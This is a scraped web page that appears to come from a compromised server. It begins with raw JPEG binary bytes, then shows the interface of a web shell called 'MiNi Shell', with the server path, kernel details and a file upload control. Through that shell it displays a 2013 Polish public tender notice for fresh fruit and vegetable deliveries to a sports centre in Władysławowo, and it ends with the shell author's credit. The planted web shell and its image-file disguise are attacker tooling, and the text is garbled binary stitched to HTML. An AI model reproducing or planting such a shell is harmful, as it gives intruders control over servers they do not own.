JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130129/39854-N-2013.html

<p class="kh_header"><b>Władysławowo: Sukcesywne dostawy  warzyw i owoców świeżych</b><br>
<b>Numer ogłoszenia: 39854 - 2013; data zamieszczenia: 29.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie , ul. Żeromskiego 52, 84-120 Władysławowo, woj. pomorskie, tel. 058 6746314, faks 058 6746350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cetniewo.cos.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy  warzyw i owoców świeżych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy  warzyw i owoców świeżych  przez okres 2 miesięcy  na potrzeby działu gastronomii w Ośrodku Przygotowań Olimpijskich we Władysławowie. Wartość szacunkowa zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity: Dz. U. 2010 r. Nr 113 poz. 759 ze zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1, 03.22.10.00-6, 03.22.11.00-7, 03.22.00.00-9, 03.22.11.12-4, 03.22.11.13-1, 03.22.12.40-0, 03.22.13.00-9, 03.22.21.10-7, 03.22.22.00-5, 03.22.22.20-0, 03.22.23.20-2, 03.22.23.30-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Jeżeli z upływem 2 miesięcy  od dnia podpisania  umowy kwota określona w ust. 1 zawartej umowy pozostanie nie zrealizowana, Strony mogą uzgodnić, w formie pisemnego aneksu, realizację niniejszej umowy do momentu osiągnięcia tej kwoty, nie dłużej jednak niż 4 lata od dnia podpisania umowy
2.	Strony zgodnie oświadczają, że ilość podana w formularzu cenowym (załącznik Nr 2 do Umowy) jest szacunkowa. Zamawiający zastrzega sobie prawo, w zależności od preferencji klientów Zamawiającego oraz możliwości Wykonawcy, do zmian: ilości (według zamówień częściowych).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cetniewo.cos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającgo ul. Żeromskiego 52, 84-120 Władysławowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2013 godzina 10:00, miejsce: Siedziba Zamawiającgo ul. Żeromskiego 52, 84-120 Władysławowo :SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ananasy - 	szt	30
2.	Arbuz - 	kg	20
3.	Bakłażan-	kg	30
4.	Boczniak - szt	50
5.	Bazylia świeża - 	szt	10
6.	Banan - klasy I, 	kg	560
7.	Biała rzodkiew - 	kg	70
8.	Borowik suszony kl I -	kg	2
9.	Brokuły  świeże-szt	70
10.	Buraki ćwikłowe - klasy pierwszej.,kg	130
11.	Cebula - 	kg	70
12.	Cebula czosnkowa - 	kg	30
13.	Cebula czerwona - 	kg	20
14.	Cukinia zielona -kg	90
15.	Cykoria biała,czerwona - opak	15
16.	Cytryny - gatunek I - 	kg	180
17.	Czosnek - kg	20
18.	Fasola Piękny Jaś - nasiona nie powinny być zbutwiałe, spleśniałe; pakowane w  worki o wadze 5kg                       	kg	25
19.	Grapefruity - żółty, bez uszkodzeń mechanicznych,  nie nadmrznięte nie nadgniłe, bez plam, wolne od uszkodzeń spowodowanych przez szkodniki, o dojrzałości konsumpcyjnej; soczyste, jędrne. Powinny posiadać cienką skórkę. pakowany w kartonach standardowych 	kg	40
20.	Grapefruity- ,	kg	40
21.	Groch łuskany - kg	7
22.	Gruszki konferencja- kg	500
23.	Jabłka krajowe Extra-kg	600
24.	Jabłka zielone - 	kg	250
25.	Kalafior -  	szt.	50
26.	Kalarepa: , szt	100
27.	Kapusta biała - 	kg	200
28.	Kapusta czerwona - kg	150
29.	Kapusta kwaszona-  kg	170
30.	Kapusta pekińska - 	kg	100
31.	Kapusta włoska - kg	50
32.	Kiwi - klasy I;kg	300
33.	Koperek świeży  	pęczki	150
34.	Limonka -kg	10
35.	Marchew - kg	180
36.	Melon - ;	szt	15
37.	Melon Kanalupa - owoc szt	15
38.	Ogórek świeży długi (szklarnia)-	kg	250
39.	Ogórki kwaszone- , kg	150
40.	Papryka Czuszka (ostra) - 	kg	1
41.	Papryka świeża, zielona - ,	kg	60
42.	Papryka świeża, żółta - 	kg	70
43.	Papryka świeża,czerwona,  - 	kg	100
44.	Pieczarka kl I - kg	100
45.	Pietruszka dekoracyjna - pęczki	50
46.	Pietruszka korzeń -  	kg	60
47.	Pietruszka Natka - pęczki	150
48.	Pomarańcze - 	kg	400
49.	Pomidor - 	kg	900
50.	Pomidory koktajlowe- kg	10
51.	Por - jesienny  , 	kg	30
52.	Rzodkiewka klasa I	pęczki	60
53.	Salata rzymska-	szt	80
54.	Sałata dekoracyjna szt	60
55.	sałata FRYZA-200g	szt	40
56.	Sałata lodowa - 	szt	200
57.	Sałata Raddicchio - 	szt	30
58.	Sałata zielona masłowa - szt	250
59.	Seler - 	kg	70
60.	Szczypiorek - 	szt	70
61.	Szczypiorek trawka - 	80
62.	Tymianek świeży-sadzony w doniczce,kl,I ,bez oznak więdnięcia	szt	10
63.	Rozmaryn świeży - sadzony w doniczce,bez oznak więdnięcia	szt	7
64.	Mandarynka -kg	300
65.	Melisa świeża - sadzona w doniczce.,bez oznak więdnięcia	szt	3
66.	Mięta świeża - sadzona w doniczce 	szt	10
67.	Szałwia świeża - sadzone w doniczce, bez oznak więdnięcia.	szt	3
68.	Bazylia świeża - sadzona w doniczce,bez oznak więdnięcia	szt	5
69.	Oregano świeże gat.1- sadzone w doniczce, bez oznak więdnięcia.	szt	3
70.	Kiełki lucerny - świeże, klasa I, opakowanie 250g	szt	3
71.	Kiełki słonecznika - klasa I, opakowanie 250g.	szt	3
72.	Kiełki rzodkiewki - klasa I, opakowanie 250g.	szt	3
73.	Kiełki zielone fasoli - klasa I, opakowanie 250g.	szt	3
74.	Kolendra świeża gat.1- sadzona w doniczce, bez oznak więdnięcia.	szt	3
75.	Sałata RUCOLA - opakowanie plastikowe waga netto 250g	kg	3
76.	Sałata roszponka - opakowanie min 100 g	kg	1
77.	Winogrono o barwie ciemnofioletowej- kg	100
78.	Winogrono o barwie żółtozielonej -kg	100
79.	Ziemniaki  - 	kg	3500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1, 03.22.10.00-7, 03.22.00.00-9, 03.22.12.40-0, 03.22.12.70-9, 03.22.13.00-9, 03.22.21.10-7, 03.22.22.20-5, 03.22.23.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa i owoce - okolicznościowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Awokado - jest intensywnie zielony,zółty lub fioletowy,bez uszkodzeń zewnętrznych	szt	7
2.	Borówka - opakowanie 125g	szt	7
3.	cebula szalotka - powinna być zdrowa,bez uszkodzeń,jędrna,czysta,nie zaparzona.Kształt wydłużony,barwa fioletowo-szara lub filoletowo-brązowa.Opakowanie standardowe-worki	kg	3
4.	Figi świeże-kl.I,bez oznak pleśni,zapachu stęchlizny Waga min 70g	szt	20
5.	Granat - skórka powinna być gładka,błyszcząca,cienka,napięta,bez zadrapań i skaleczeń Waga min 150g	szt	7
6.	Groszek cukrowy świeży - powinien mieć jędrne,jasnozielone,płaskie,zamknięte strączki,bez uszkodzeń, bez czarnych plam, szkodników,opakowanie 250 gr	opak	10
7.	Karambole - owoc świeży, dojrzały, bez przebarwień, owoce, o wydłużonym kształcie, osiągają wielkość 10-12 cm. Na ich powierzchni widać cztery - pięć biegnących wzdłuż karbów.	szt	7
8.	Kokos świeży	szt	7
9.	Kolendra świeża gat.1- sadzona w doniczce, bez oznak więdnięcia.	szt	3
10.	koper włoski-świeże bulwy kopry powinny być jędrne,kolor biały przechodzący w jasnozielony,smak lekko anyżowaty	szt	7
11.	Korzeń imbiru - 	kg	5
12.	Kumquat - klasa I , gładka i cienka skókaowoce nie powinny być poobijane i nie uszkodzine,o jednolicie pomarańczowy, kolorze,opakowanie max 250 gr	opak	3
13.	Kwiaty jadalne - głowki kwiatów np.nasturcja,pierwiosnek,kwiat pomarańczy,fiołek ogrodowy,nagietek,koniczyna łąkowa-do dekoracji,opakowanie 200g	opak	3
14.	Liczi	kg	3
15.	Majeranek świeży - gatunek I,sadzony w doniczce,bez uszkodzeń	szt	7
16.	Malina świeża-owoc świeży,nie powinny być zaparzone,zapleśniałe-opakowanie max 250 gr	szt	15
17.	Mango - owoc nie powinien być zwiędły, bez uszkodzeń	szt	6
18.	Papaja - owoc nie powinien być zwiędły, bez uszkodzeń	szt	3
19.	Physalis - powinien mieć pomarańczową, lśniącą i lekko kleistą skórkę, miąższ żółty, soczysty, miękki, bez oznak pleśni - opak.max 100 gr	opak	3
20.	Pitahaya - gruba skórka z łukowatymi wyrostkami,kolor od żółtego do czerwonego,posiada słodkawy smak, jędrna, soczysta, bez plam i pleśni	szt	6
21.	Porzeczka - opakowanie 500g	opak	10
22.	Seler naciowy - powinien być  barwy zielonej, czysty, nie zwiędły, bez części pożółkłych Min waga 500g	szt	7
23.	Spinak świeży-kl.I, bez oznak zgnilizny, zaparzeń , pęk	szt	15
24.	Szparagi świeże/zielone lub białe/-charakteryzuje się lekko gorzkawym ale słodkim smakiem,świeże szparagi są jędrne i odznaczają się intensywnym kolorem-opakowanie max 500 gr 	szt	40
25.	Truskawka - gatunek extra, owoce o najwyższej jakości, kształcie, zabarwieniu w typowym dla danej odmiany, nie powinny być zaparzone, zapleśniałe.	kg	5
26.	trawa cytrynowa-gałązki o lekko zielonkawym zabarwieniu,opakowanie max 500 gr	opak	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.22.13.00-9, 03.22.21.10-7, 03.22.22.20-5, 03.22.23.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com